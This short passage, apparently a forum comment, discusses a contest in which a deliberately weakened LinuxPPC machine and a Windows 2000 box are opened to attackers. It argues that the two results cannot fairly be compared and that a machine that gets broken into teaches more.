Another benefit could be that the two machines cannot be compared that way:
The linuxppc machine is willingly set up in a way that increases the risks of anyone getting in.
So if the linuxppc machine gets compromised it is not a big deal, it is more or less intended.
That makes it kind of hard to brag that the win2k box remained intact (in some sense anyway) while the linuxppc has been hacked.
Besides that: there is much more to learn from a box that does get broken into. Something to do with "learning from mistakes" I believe... and I quite like the idea of other services getting a nice pounding too.